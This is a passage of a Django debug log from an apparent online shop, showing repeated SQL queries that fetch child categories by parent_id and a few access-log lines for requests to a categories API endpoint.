"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:32,489 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:32,493 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:10:32] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-16 07:10:32,496 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:32,498 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:32,500 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:32,503 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:32,506 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:32,508 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:32,510 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:32,513 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:32,515 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:32,518 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:32,520 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:32,523 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:32,525 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:32,527 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:32,531 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:32,533 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:32,535 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:32,538 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:32,540 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:32,542 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:32,546 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:32,548 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:32,550 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:32,552 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:32,555 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:32,558 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:32,560 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:32,563 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:32,565 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:32,567 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:32,571 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:32,573 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:32,575 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:32,577 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:32,580 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:32,582 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:32,585 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:32,587 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:32,589 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:32,592 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:32,594 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:36,335 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:36,341 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:36,345 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:36,347 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:36,350 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:10:36,352 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:36,354 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:36,357 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:36,359 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:36,362 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:36,364 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:36,367 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:36,369 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:36,371 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:36,374 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:36,376 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:36,379 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:36,381 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:36,383 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:36,387 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:36,389 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:36,391 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:36,393 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:36,395 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, 